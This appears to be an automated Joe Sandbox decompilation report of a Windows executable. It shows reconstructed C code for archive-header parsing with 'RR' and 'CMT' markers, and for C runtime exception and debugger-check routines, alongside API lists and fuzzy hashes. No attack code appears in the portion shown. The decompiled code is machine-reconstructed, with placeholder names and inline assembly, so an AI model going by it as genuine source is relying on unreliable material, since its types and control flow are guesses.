                										_t371 =  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))() - _t657;
                										__eflags = _t371;
                										asm("sbb edx, ecx");
                										 *0x403278(_t371, _t640, 0);
                										 *((intOrPtr*)( *_t516 + 0x10))();
                										 *(_t708 + 0x5b) = 1;
                										do {
                											_t374 = E003D9892(_t516);
                											asm("sbb al, al");
                											_t377 =  !( ~_t374) &  *(_t708 + 0x5b);
                											 *(_t708 + 0x5b) = _t377;
                											_t657 = _t657 - 1;
                											__eflags = _t657;
                										} while (_t657 != 0);
                										__eflags = _t377;
                										if(_t377 != 0) {
                											goto L130;
                										}
                										goto L128;
                									}
                									_t354 = 0;
                									__eflags =  *(_t516 + 0x2234);
                									if( *(_t516 + 0x2234) == 0) {
                										goto L118;
                									}
                									goto L117;
                								}
                								_t378 = _t340 - 1;
                								__eflags = _t378;
                								if(_t378 == 0) {
                									L35:
                									__eflags = _t537 - 2;
                									_t68 = (0 | _t537 == 0x00000002) - 1; // -1
                									_t665 = (_t68 & 0x00002350) + 0x2298 + _t516;
                									 *(_t708 + 0x4c) = _t665;
                									E003DACC4(_t665, 0);
                									_t560 = 5;
                									memcpy(_t665, _t516 + 0x21fc, _t560 << 2);
                									_t694 =  *(_t708 + 0x4c);
                									_t668 =  *(_t708 + 0x18);
                									_t562 =  *(_t694 + 8);
                									 *(_t694 + 0x1098) =  *(_t694 + 8) & 1;
                									 *(_t694 + 0x1099) = _t562 >> 0x00000001 & 1;
                									 *(_t694 + 0x109b) = _t562 >> 0x00000002 & 1;
                									 *(_t694 + 0x10a0) = _t562 >> 0x0000000a & 1;
                									_t395 = _t562 & 0x00000010;
                									__eflags = _t668 - 2;
                									if(_t668 != 2) {
                										L38:
                										_t643 = 0;
                										__eflags = 0;
                										 *(_t708 + 0x5b) = 0;
                										L39:
                										 *((char*)(_t694 + 0x10f0)) =  *(_t708 + 0x5b);
                										_t516 =  *((intOrPtr*)(_t708 + 0x14));
                										__eflags = _t668 - 2;
                										if(_t668 == 2) {
                											L41:
                											_t396 = _t643;
                											L42:
                											 *(_t694 + 0x10fa) = _t396;
                											_t563 = _t562 & 0x000000e0;
                											__eflags = _t563 - 0xe0;
                											 *((char*)(_t694 + 0x10f1)) = 0 | _t563 == 0x000000e0;
                											__eflags = _t563 - 0xe0;
                											if(_t563 != 0xe0) {
                												_t644 =  *(_t694 + 8);
                												_t400 = 0x10000 << (_t644 >> 0x00000005 & 0x00000007);
                												__eflags = 0x10000;
                											} else {
                												_t400 = _t643;
                												_t644 =  *(_t694 + 8);
                											}
                											 *(_t694 + 0x10f4) = _t400;
                											 *(_t694 + 0x10f3) = _t644 >> 0x0000000b & 0x00000001;
                											 *(_t694 + 0x10f2) = _t644 >> 0x00000003 & 0x00000001;
                											 *((intOrPtr*)(_t694 + 0x14)) = E003DCBFB(_t708 + 0x1c);
                											 *((intOrPtr*)(_t708 + 0x54)) = E003DCBFB(_t708 + 0x1c);
                											 *((char*)(_t694 + 0x18)) = E003DCBAF(_t708 + 0x1c);
                											 *(_t694 + 0x1070) = 2;
                											 *((intOrPtr*)(_t694 + 0x1074)) = E003DCBFB(_t708 + 0x1c);
                											 *(_t708 + 0x44) = E003DCBFB(_t708 + 0x1c);
                											 *(_t694 + 0x1c) = E003DCBAF(_t708 + 0x1c) & 0x000000ff;
                											 *((char*)(_t694 + 0x20)) = E003DCBAF(_t708 + 0x1c) - 0x30;
                											 *(_t708 + 0x50) = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
                											_t413 = E003DCBFB(_t708 + 0x1c);
                											_t647 =  *(_t694 + 0x1c);
                											 *(_t708 + 0x48) = _t413;
                											 *(_t694 + 0x24) = _t413;
                											__eflags = _t647 - 0x14;
                											if(_t647 < 0x14) {
                												__eflags = _t413 & 0x00000010;
                												if((_t413 & 0x00000010) != 0) {
                													 *((char*)(_t694 + 0x10f1)) = 1;
                												}
                											}
                											 *(_t694 + 0x109c) = 0;
                											__eflags =  *(_t694 + 0x109b);
                											if( *(_t694 + 0x109b) == 0) {
                												L57:
                												_t414 =  *((intOrPtr*)(_t694 + 0x18));
                												 *(_t694 + 0x10fc) = 2;
                												__eflags = _t414 - 3;
                												if(_t414 == 3) {
                													L61:
                													 *(_t694 + 0x10fc) = 1;
                													L62:
                													 *(_t694 + 0x1100) = 0;
                													__eflags = _t414 - 3;
                													if(_t414 == 3) {
                														__eflags = ( *(_t708 + 0x48) & 0x0000f000) - 0xa000;
                														if(( *(_t708 + 0x48) & 0x0000f000) == 0xa000) {
                															__eflags = 0;
                															 *(_t694 + 0x1100) = 1;
                															 *((short*)(_t694 + 0x1104)) = 0;
                														}
                													}
                													__eflags = _t668 - 2;
                													if(_t668 == 2) {
                														L67:
                														_t415 = 0;
                														goto L68;
                													} else {
                														_t415 = 1;
                														__eflags =  *(_t694 + 0x24);
                														if( *(_t694 + 0x24) < 0) {
                															L68:
                															 *((char*)(_t694 + 0x10f8)) = _t415;
                															_t418 =  *(_t694 + 8) >> 0x00000008 & 0x00000001;
                															__eflags = _t418;
                															 *(_t694 + 0x10f9) = _t418;
                															if(_t418 == 0) {
                																__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
                																_t640 = 0;
                																_t669 = 0;
                																_t141 =  *((intOrPtr*)(_t708 + 0x54)) == 0xffffffff;
                																__eflags = _t141;
                																_t419 = _t418 & 0xffffff00 | _t141;
                																L74:
                																 *(_t694 + 0x109a) = _t419;
                																 *(_t708 + 0x5b) = _t419;
                																 *((intOrPtr*)(_t694 + 0x1058)) = 0 +  *((intOrPtr*)(_t694 + 0x14));
                																asm("adc edi, ecx");
                																 *((intOrPtr*)(_t694 + 0x105c)) = _t669;
                																asm("adc edx, ecx");
                																 *(_t694 + 0x1060) = 0 +  *((intOrPtr*)(_t708 + 0x54));
                																__eflags =  *(_t708 + 0x5b);
                																 *(_t694 + 0x1064) = _t640;
                																if( *(_t708 + 0x5b) != 0) {
                																	 *(_t694 + 0x1060) = 0x7fffffff;
                																	 *(_t694 + 0x1064) = 0x7fffffff;
                																}
                																_t424 =  *(_t708 + 0x50);
                																_t670 = 0x1fff;
                																__eflags = _t424 - 0x1fff;
                																if(_t424 < 0x1fff) {
                																	_t670 = _t424;
                																}
                																E003DCC5D(_t708 + 0x1c, _t708 - 0x2030, _t670);
                																_t427 = 0;
                																__eflags =  *(_t708 + 0x18) - 2;
                																 *((char*)(_t708 + _t670 - 0x2030)) = 0;
                																_t585 = ((0 |  *(_t708 + 0x18) == 0x00000002) - 0x00000001 & 0x00002350) + 0x22c0 + _t516;
                																__eflags =  *(_t708 + 0x18) - 2;
                																 *((intOrPtr*)(_t708 + 0x54)) = _t585;
                																if( *(_t708 + 0x18) != 2) {
                																	E003E1B84(_t708 - 0x2030, _t585, 0x800);
                																	_t431 =  *((intOrPtr*)(_t694 + 0xc)) -  *(_t708 + 0x50);
                																	__eflags =  *(_t694 + 8) & 0x00000400;
                																	_t671 = _t431 - 0x20;
                																	if(( *(_t694 + 8) & 0x00000400) != 0) {
                																		_t671 = _t431 - 0x28;
                																	}
                																	__eflags = _t671;
                																	if(_t671 > 0) {
                																		E003D20BD(_t694 + 0x1028, _t671);
                																		_t676 = _t694 + 0x1028;
                																		_t431 = E003F3E49(E003DCC5D(_t708 + 0x1c,  *_t676, _t671),  *((intOrPtr*)(_t708 + 0x54)), L"RR");
                																		__eflags = _t431;
                																		if(_t431 == 0) {
                																			__eflags =  *((intOrPtr*)(_t694 + 0x102c)) - 0x14;
                																			if( *((intOrPtr*)(_t694 + 0x102c)) >= 0x14) {
                																				_t609 =  *_t676;
                																				_t184 = _t609 + 0xb; // 0x7500
                																				asm("cdq");
                																				_t695 =  *_t184 & 0x000000ff;
                																				_t185 = _t609 + 0xa; // 0x750025
                																				asm("cdq");
                																				_t697 = (_t695 << 8) + ( *_t185 & 0x000000ff);
                																				_t190 = _t609 + 9; // 0x75002500
                																				asm("adc edi, edx");
                																				asm("cdq");
                																				_t699 = (_t697 << 8) + ( *_t190 & 0x000000ff);
                																				_t195 = _t609 + 8; // 0x250068
                																				asm("adc edi, edx");
                																				asm("cdq");
                																				_t701 = (_t699 << 8) + ( *_t195 & 0x000000ff);
                																				asm("adc edi, edx");
                																				 *(_t516 + 0x21d8) = _t701 << 9;
                																				 *(_t516 + 0x21dc) = ((((_t640 << 0x00000020 | _t695) << 0x8 << 0x00000020 | _t697) << 0x8 << 0x00000020 | _t699) << 0x8 << 0x00000020 | _t701) << 9;
                																				 *0x403278();
                																				_t469 = E003E0264( *(_t516 + 0x21d8),  *(_t516 + 0x21dc),  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))(), _t640);
                																				 *(_t516 + 0x21e0) = _t469;
                																				 *(_t708 + 0x48) = _t469;
                																				_t470 = E003EEBA0(_t468, _t640, 0xc8, 0);
                																				asm("adc edx, [ebx+0x21dc]");
                																				_t431 = E003E0264(_t470 +  *(_t516 + 0x21d8), _t640, _t468, _t640);
                																				_t612 =  *(_t708 + 0x48);
                																				_t694 =  *(_t708 + 0x4c);
                																				__eflags = _t431 - _t612;
                																				if(_t431 > _t612) {
                																					_t431 = _t612 + 1;
                																					 *(_t516 + 0x21e0) = _t612 + 1;
                																				}
                																			}
                																		}
                																	}
                																	_t432 = E003F3E49(_t431,  *((intOrPtr*)(_t708 + 0x54)), L"CMT");
                																	__eflags = _t432;
                																	if(_t432 == 0) {
                																		 *((char*)(_t516 + 0x6cce)) = 1;
                																	}
                																} else {
                																	_t640 = 0;
                																	 *_t585 = 0;
                																	__eflags =  *(_t694 + 8) & 0x00000200;
                																	if(( *(_t694 + 8) & 0x00000200) != 0) {
                																		E003D6976(_t708);
                																		_t478 = E003F3E90(_t708 - 0x2030) + 1;
                																		__eflags = _t670 - _t478;
                																		if(_t670 > _t478) {
                																			__eflags = _t478 + _t708 - 0x2030;
                																			E003D6986(_t708, _t708 - 0x2030, _t670, _t478 + _t708 - 0x2030, _t670 - _t478,  *((intOrPtr*)(_t708 + 0x54)), 0x800);
                																		}
                																		_t585 =  *((intOrPtr*)(_t708 + 0x54));
                																		_t427 = 0;
                																		__eflags = 0;
                																	}
                																	__eflags =  *_t585 - _t427;
                																	if( *_t585 == _t427) {
                																		_push(1);
                																		_push(0x800);
                																		_push(_t585);
                																		_push(_t708 - 0x2030);
                																		E003E02BA();
                																	}
                																	E003D2134(_t516, _t694);
                																}
                																__eflags =  *(_t694 + 8) & 0x00000400;
                																if(( *(_t694 + 8) & 0x00000400) != 0) {
                																	E003DCC5D(_t708 + 0x1c, _t694 + 0x10a1, 8);
                																}
                																E003E140E( *(_t708 + 0x44));
                																__eflags =  *(_t694 + 8) & 0x00001000;
                																if(( *(_t694 + 8) & 0x00001000) == 0) {
                																	L112:
                																	 *((intOrPtr*)(_t516 + 0x6cc0)) = E003D3EFB( *((intOrPtr*)(_t516 + 0x6cc0)),  *(_t516 + 0x6cc4),  *((intOrPtr*)(_t694 + 0x1058)),  *((intOrPtr*)(_t694 + 0x105c)), 0, 0);
                																	 *(_t516 + 0x6cc4) = _t640;
                																	 *(_t708 + 0x44) =  *(_t694 + 0x10f2);
                																	_t437 = E003DCCAC(_t708 + 0x1c,  *(_t708 + 0x44));
                																	__eflags =  *_t694 - (_t437 & 0x0000ffff);
                																	if( *_t694 != (_t437 & 0x0000ffff)) {
                																		 *((char*)(_t516 + 0x6cdc)) = 1;
                																		E003D6D83(0x411098, 1);
                																		__eflags =  *((char*)(_t708 + 0x5a));
                																		if(__eflags == 0) {
                																			E003D2021(__eflags, 0x1c, _t516 + 0x32,  *((intOrPtr*)(_t708 + 0x54)));
                																		}
                																	}
                																	goto L119;
                																} else {
                																	_t442 = E003DCBC6(_t708 + 0x1c);
                																	 *_t708 = _t516 + 0x32d8;
                																	 *((intOrPtr*)(_t708 + 4)) = _t516 + 0x32e0;
                																	 *((intOrPtr*)(_t708 + 8)) = _t516 + 0x32e8;
                																	__eflags = 0;
                																	_t672 = 0;
                																	 *((intOrPtr*)(_t708 + 0xc)) = 0;
                																	_t447 = _t442 & 0x0000ffff;
                																	 *(_t708 + 0x50) = 0;
                																	 *(_t708 + 0x44) = _t447;
                																	do {
                																		_t593 = 3;
                																		_t520 = _t447 >> _t593 - _t672 << 2;
                																		__eflags = _t520 & 0x00000008;
                																		if((_t520 & 0x00000008) == 0) {
                																			goto L110;
                																		}
                																		__eflags =  *(_t708 + _t672 * 4);
                																		if( *(_t708 + _t672 * 4) == 0) {
                																			goto L110;
                																		}
                																		__eflags = _t672;
                																		if(__eflags != 0) {
                																			E003E140E(E003DCBFB(_t708 + 0x1c));
                																		}
                																		E003E1218( *(_t708 + _t672 * 4), _t640, _t708, __eflags, _t708 - 0x30);
                																		__eflags = _t520 & 0x00000004;
                																		if((_t520 & 0x00000004) != 0) {
                																			_t249 = _t708 - 0x1c;
                																			 *_t249 =  *(_t708 - 0x1c) + 1;
                																			__eflags =  *_t249;
                																		}
                																		_t597 = 0;
                																		 *(_t708 - 0x18) = 0;
                																		_t521 = _t520 & 0x00000003;
                																		__eflags = _t521;
                																		if(_t521 <= 0) {
                																			L109:
                																			_t450 = _t597 * 0x64;
                																			__eflags = _t450;
                																			 *(_t708 - 0x18) = _t450;
                																			E003E146A( *(_t708 + _t672 * 4), _t640, _t708 - 0x30);
                																			_t447 =  *(_t708 + 0x44);
                																		} else {
                																			_t673 = 3;
                																			_t675 = _t673 - _t521 << 3;
                																			__eflags = _t675;
                																			do {
                																				_t455 = (E003DCBAF(_t708 + 0x1c) & 0x000000ff) << _t675;
                																				_t675 = _t675 + 8;
                																				_t597 =  *(_t708 - 0x18) | _t455;
                																				 *(_t708 - 0x18) = _t597;
                																				_t521 = _t521 - 1;
                																				__eflags = _t521;
                																			} while (_t521 != 0);
                																			_t672 =  *(_t708 + 0x50);
                																			goto L109;
                																		}
                																		L110:
                																		_t672 = _t672 + 1;
                																		 *(_t708 + 0x50) = _t672;
                																		__eflags = _t672 - 4;
                																	} while (_t672 < 4);
                																	_t516 =  *((intOrPtr*)(_t708 + 0x14));
                																	goto L112;
                																}
                															}
                															_t669 = E003DCBFB(_t708 + 0x1c);
                															_t484 = E003DCBFB(_t708 + 0x1c);
                															__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
                															_t640 = _t484;
                															if( *((intOrPtr*)(_t708 + 0x54)) != 0xffffffff) {
                																L72:
                																_t419 = 0;
                																goto L74;
                															}
                															__eflags = _t640 - 0xffffffff;
                															if(_t640 != 0xffffffff) {
                																goto L72;
                															}
                															_t419 = 1;
                															goto L74;
                														}
                														goto L67;
                													}
                												}
                												__eflags = _t414 - 5;
                												if(_t414 == 5) {
                													goto L61;
                												}
                												__eflags = _t414 - 6;
                												if(_t414 < 6) {
                													 *(_t694 + 0x10fc) = 0;
                												}
                												goto L62;
                											} else {
                												_t648 = _t647 - 0xd;
                												__eflags = _t648;
                												if(_t648 == 0) {
                													 *(_t694 + 0x109c) = 1;
                													goto L57;
                												}
                												_t650 = _t648;
                												__eflags = _t650;
                												if(_t650 == 0) {
                													 *(_t694 + 0x109c) = 2;
                													goto L57;
                												}
                												_t651 = _t650 - 5;
                												__eflags = _t651;
                												if(_t651 == 0) {
                													L54:
                													 *(_t694 + 0x109c) = 3;
                													goto L57;
                												}
                												__eflags = _t651 == 6;
                												if(_t651 == 6) {
                													goto L54;
                												}
                												 *(_t694 + 0x109c) = 4;
                												goto L57;
                											}
                										}
                										__eflags = _t395;
                										_t396 = 1;
                										if(_t395 != 0) {
                											goto L42;
                										}
                										goto L41;
                									}
                									__eflags = _t395;
                									if(_t395 == 0) {
                										goto L38;
                									}
                									 *(_t708 + 0x5b) = 1;
                									_t643 = 0;
                									goto L39;
                								}
                								_t488 = _t378 - 1;
                								__eflags = _t488;
                								if(_t488 == 0) {
                									goto L35;
                								}
                								__eflags = _t488 == 0;
                								if(_t488 == 0) {
                									_t624 = 5;
                									memcpy(_t516 + 0x45a8, _t516 + 0x21fc, _t624 << 2);
                									_t653 =  *(_t516 + 0x45b0);
                									 *(_t516 + 0x45c4) =  *(_t516 + 0x45b0) & 0x00000001;
                									_t628 = _t653 >> 0x00000001 & 0x00000001;
                									_t640 = _t653 >> 0x00000003 & 0x00000001;
                									 *(_t516 + 0x45c5) = _t628;
                									 *(_t516 + 0x45c6) = _t653 >> 0x00000002 & 0x00000001;
                									 *(_t516 + 0x45c7) = _t640;
                									__eflags = _t628;
                									if(_t628 != 0) {
                										 *((intOrPtr*)(_t516 + 0x45bc)) = E003DCBFB(_t708 + 0x1c);
                									}
                									__eflags =  *(_t516 + 0x45c7);
                									if( *(_t516 + 0x45c7) != 0) {
                										_t498 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
                										 *(_t516 + 0x45c0) = _t498;
                										 *(_t516 + 0x6cf0) = _t498;
                									}
                									goto L119;
                								} else {
                									__eflags =  *(_t516 + 0x2204) & 0x00008000;
                									if(( *(_t516 + 0x2204) & 0x00008000) != 0) {
                										 *((intOrPtr*)(_t516 + 0x6cc0)) =  *((intOrPtr*)(_t516 + 0x6cc0)) + E003DCBFB(_t708 + 0x1c);
                										asm("adc dword [ebx+0x6cc4], 0x0");
                									}
                									goto L120;
                								}
                							}
                							__eflags = _t688 - 1;
                							if(_t688 != 1) {
                								L24:
                								_t335 = _t533 - 7;
                								goto L25;
                							}
                							__eflags =  *(_t516 + 0x2204) & 0x00000002;
                							if(( *(_t516 + 0x2204) & 0x00000002) == 0) {
                								goto L24;
                							}
                							goto L23;
                						}
                						_t501 = _t334 - 1;
                						__eflags = _t501;
                						if(_t501 == 0) {
                							 *(_t516 + 0x2200) = _t640;
                							_t688 = _t640;
                							goto L20;
                						}
                						_t502 = _t501 - 6;
                						__eflags = _t502;
                						if(_t502 == 0) {
                							_push(3);
                							L17:
                							_pop(_t503);
                							 *(_t516 + 0x2200) = _t503;
                							_t688 = _t503;
                							goto L20;
                						}
                						__eflags = _t502 != 1;
                						if(_t502 != 1) {
                							goto L20;
                						} else {
                							_push(5);
                							goto L17;
                						}
                					} else {
                						E003D20D7(_t516);
                						goto L131;
                					}
                				}
                				_t639 =  *((intOrPtr*)(__ecx + 0x6cd8)) + _t657;
                				asm("adc eax, ecx");
                				_t718 =  *((intOrPtr*)(__ecx + 0x6cbc));
                				if(_t718 < 0 || _t718 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t639) {
                					goto L7;
                				} else {
                					 *((char*)(_t708 + 0x5a)) = 1;
                					E003D3E6D(_t516);
                					 *0x403278(_t708 + 0x40, 8);
                					if( *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0xc))))() == 8) {
                						_t707 = _t516 + 0x1038;
                						E003D603A(_t707, 0, 4,  *((intOrPtr*)(_t516 + 0x21d4)) + 0x6024, _t708 + 0x40, 0, 0, 0, 0);
                						 *((intOrPtr*)(_t708 + 0x3c)) = _t707;
                						goto L8;
                					}
                					goto L5;
                				}
                			}


                APIs
                • __EH_prolog.LIBCMT ref: 003D2874
                • _strlen.LIBCMT ref: 003D2E3F
                  • Part of subcall function 003E02BA: __EH_prolog.LIBCMT ref: 003E02BF
                  • Part of subcall function 003E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003DBAE9,00000000,?,?,?,000303F2), ref: 003E1BA0
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D2F91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1206968400-2756464174
                • Opcode ID: 878f7bbbb0f668aec3cd17ec035d1314d5e4c6f8dbd2b79811fd4e5779754715
                • Instruction ID: ae991a108ce2f9c0860181fc95f10c401957663cfe3cf50cde84f5d55e0e8084
                • Opcode Fuzzy Hash: 878f7bbbb0f668aec3cd17ec035d1314d5e4c6f8dbd2b79811fd4e5779754715
                • Instruction Fuzzy Hash: F56235729102458FDB1ADF34D8866EA3BA1EF64300F09457FEC9A8F382DB759945CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E003EF838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                				char _v0;
                				struct _EXCEPTION_POINTERS _v12;
                				intOrPtr _v80;
                				intOrPtr _v88;
                				char _v92;
                				intOrPtr _v608;
                				intOrPtr _v612;
                				void* _v616;
                				intOrPtr _v620;
                				char _v624;
                				intOrPtr _v628;
                				intOrPtr _v632;
                				intOrPtr _v636;
                				intOrPtr _v640;
                				intOrPtr _v644;
                				intOrPtr _v648;
                				intOrPtr _v652;
                				intOrPtr _v656;
                				intOrPtr _v660;
                				intOrPtr _v664;
                				intOrPtr _v668;
                				char _v808;
                				char* _t39;
                				long _t49;
                				intOrPtr _t51;
                				void* _t54;
                				intOrPtr _t55;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				intOrPtr _t59;
                				intOrPtr* _t60;
                
                				_t59 = __esi;
                				_t58 = __edi;
                				_t57 = __edx;
                				if(IsProcessorFeaturePresent(0x17) != 0) {
                					_t55 = _a4;
                					asm("int 0x29");
                				}
                				E003EFA46(_t34);
                				 *_t60 = 0x2cc;
                				_v632 = E003EFFF0(_t58,  &_v808, 0, 3);
                				_v636 = _t55;
                				_v640 = _t57;
                				_v644 = _t51;
                				_v648 = _t59;
                				_v652 = _t58;
                				_v608 = ss;
                				_v620 = cs;
                				_v656 = ds;
                				_v660 = es;
                				_v664 = fs;
                				_v668 = gs;
                				asm("pushfd");
                				_pop( *_t15);
                				_v624 = _v0;
                				_t39 =  &_v0;
                				_v612 = _t39;
                				_v808 = 0x10001;
                				_v628 =  *((intOrPtr*)(_t39 - 4));
                				E003EFFF0(_t58,  &_v92, 0, 0x50);
                				_v92 = 0x40000015;
                				_v88 = 1;
                				_v80 = _v0;
                				_t28 = IsDebuggerPresent() - 1; // -1
                				_v12.ExceptionRecord =  &_v92;
                				asm("sbb bl, bl");
                				_v12.ContextRecord =  &_v808;
                				_t54 =  ~_t28 + 1;
                				SetUnhandledExceptionFilter(0);
                				_t49 = UnhandledExceptionFilter( &_v12);
                				if(_t49 == 0 && _t54 == 0) {
                					_push(3);
                					return E003EFA46(_t49);
                				}
                				return _t49;
                			}

                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003EF844
                • IsDebuggerPresent.KERNEL32 ref: 003EF910
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003EF930
                • UnhandledExceptionFilter.KERNEL32(?), ref: 003EF93A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: d0d9feb44271a4441b805d5f32e819196810685e09d0032377453faff594cc56
                • Instruction ID: 686db9c6fe7c919a7cb41c90c2d8c7964d7d54687376b5ec1c7a23a322d6e649
                • Opcode Fuzzy Hash: d0d9feb44271a4441b805d5f32e819196810685e09d0032377453faff594cc56
                • Instruction Fuzzy Hash: 36312B75D152299FDF11DFA5D9897CCBBB8AF08704F1041AAE40CAB290EBB19B858F44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003EE6A3(signed int _a4, signed int _a8) {
                				struct _MEMORY_BASIC_INFORMATION _v32;
                				struct _SYSTEM_INFO _v68;
                				long _t20;
                				signed int _t28;
                				void* _t30;
                				signed int _t32;
                				signed int _t40;
                				signed int _t45;
                
                				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
                				if(_t20 == 0) {
                					_push(0x19);
                					asm("int 0x29");
                				}
                				if((_v32.Protect & 0x00000044) != 0) {
                					GetSystemInfo( &_v68);
                					_t40 = _v68.dwPageSize;
                					_t32 = _t40 - 1;
                					_t45 =  !_t32 & _a4;
                					_t28 = _a8 / _t40;
                					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
                					if(_t30 == 0) {
                						L5:
                						return _t28;
                					} else {
                						goto L4;
                					}
                					do {
                						L4:
                						_t28 = 0;
                						asm("lock or [esi], eax");
                						_t45 = _t45 + _t40;
                						_t30 = _t30 - 1;
                					} while (_t30 != 0);
                					goto L5;
                				}
                				return _t20;
                			}

                APIs
                • VirtualQuery.KERNEL32(80000000,003EE5E8,0000001C,003EE7DD,00000000,?,?,?,?,?,?,?,003EE5E8,00000004,00431CEC,003EE86D), ref: 003EE6B4
                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,003EE5E8,00000004,00431CEC,003EE86D), ref: 003EE6CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: InfoQuerySystemVirtual
                • String ID: D
                • API String ID: 401686933-2746444292
                • Opcode ID: 5d3cf2dd4eb99df9d341d338f3d7b1d34fb790029dfebfe0d6b56ec171dbd5f5
                • Instruction ID: e27f3abd2c003f0d0ed31d55efbe88dbb967f68a5a8b19c171cf8b80a148d990
                • Opcode Fuzzy Hash: 5d3cf2dd4eb99df9d341d338f3d7b1d34fb790029dfebfe0d6b56ec171dbd5f5
                • Instruction Fuzzy Hash: 28012B326001596BDF14DE29DC09BDE7BAEEFC4325F0DC220ED19DB194D634D9058680
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E003F8EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v0;
                				signed int _v8;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				void* _v532;
                				intOrPtr _v536;
                				char _v540;
                				intOrPtr _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				intOrPtr _v564;
                				intOrPtr _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				intOrPtr _v580;
                				intOrPtr _v584;
                				char _v724;
                				intOrPtr _v792;
                				intOrPtr _v800;
                				char _v804;
                				intOrPtr _v808;
                				char _v812;
                				void* __edi;
                				signed int _t40;
                				char* _t47;
                				intOrPtr _t49;
                				intOrPtr _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				intOrPtr _t66;
                				int _t67;
                				intOrPtr _t68;
                				signed int _t69;
                
                				_t68 = __esi;
                				_t65 = __edx;
                				_t60 = __ebx;
                				_t40 =  *0x40e7ac; // 0xc24f6281
                				_t41 = _t40 ^ _t69;
                				_v8 = _t40 ^ _t69;
                				if(_a4 != 0xffffffff) {
                					_push(_a4);
                					E003EFA46(_t41);
                					_pop(_t61);
                				}
                				E003EFFF0(_t66,  &_v804, 0, 0x50);
                				E003EFFF0(_t66,  &_v724, 0, 0x2cc);
                				_v812 =  &_v804;
                				_t47 =  &_v724;
                				_v808 = _t47;
                				_v548 = _t47;
                				_v552 = _t61;
                				_v556 = _t65;
                				_v560 = _t60;
                				_v564 = _t68;
                				_v568 = _t66;
                				_v524 = ss;
                				_v536 = cs;
                				_v572 = ds;
                				_v576 = es;
                				_v580 = fs;
                				_v584 = gs;
                				asm("pushfd");
                				_pop( *_t22);
                				_v540 = _v0;
                				_t25 =  &_v0; // 0x7
                				_t49 = _t25;
                				_v528 = _t49;
                				_v724 = 0x10001;
                				_v544 =  *((intOrPtr*)(_t49 - 4));
                				_v804 = _a8;
